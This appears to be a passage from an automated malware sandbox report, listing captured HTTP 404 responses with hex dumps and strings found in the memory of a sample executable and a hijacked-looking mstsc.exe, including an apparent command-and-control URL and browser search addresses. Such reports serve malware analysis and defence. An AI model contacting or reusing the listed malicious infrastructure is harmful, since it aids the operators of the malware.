            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:18:29 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:19:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l232qS49SdojLUekuh%2FJBVEjw2nt63OCqRz4Y1IEYZLsUAryQX2p45V0WS6iFd5wW%2Bs5fmMZCy1FrxZqmyW9FkT1PHNJCtOwHflCZbxOizhzjWz%2Fue7aDglh0VWz9Vy7dya7Lg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1693e40ae472a7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:19:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jsvWIlM4trV5Y%2BZqVpfvd%2FhHbUYPy9y4ovQoz47zHx%2FrfYcn4NnWtAG8HNJhcRZciluubY22hcNb2bC55%2F4JMWfdr2BecV%2FZR1XSBM9IqVWxxfcNgfAvZFRqKbTFqbXKyxn4NQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c1693f3df4a0f4a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:19:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2xuLr1TuQ2KLuTF5lPOxB6q4WsqGUKepN5i%2Bre9rDvTrJ%2F%2B%2B7P6vBkiuL0irh%2Bfg5oTzBo%2BsyZIuBRariB4JmadAGwvx5ZZqUUdwdv3eblw4wuC8zvaYLoolDJBln2VpuJMGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c169403db5142f2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:19:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnA3NFqTD91MEVzKU3yAG79CS%2FCoHlLlDjcbJ2qwwOFSMBBWCTyU4pcWJS7ZMMDJRrySg7sT10aKma%2FlsLy%2FhwmthjUexifD2nYoDLR7XxJ9PY29Bhfxg6yjWxP9g0Vq5F1uCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c169413c89d41c1-EWRalt-svc: h3=":443"; ma=86400Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 09:20:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 09:20:27 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 09:20:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Sep 2024 09:20:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:20:37 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:20:40 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 11 Sep 2024 09:20:45 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 11 Sep 2024 09:20:59 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 11 Sep 2024 09:21:01 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 11 Sep 2024 09:21:05 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 11 Sep 2024 09:21:07 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 09:21:10 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>
            Source: NZuQxWwOkTbZ.exe, 00000005.00000002.4147103044.0000000004D2F000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kfowks.site
            Source: NZuQxWwOkTbZ.exe, 00000005.00000002.4147103044.0000000004D2F000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.kfowks.site/c0yj/
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mstsc.exe, 00000003.00000003.1970050854.000000000771D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
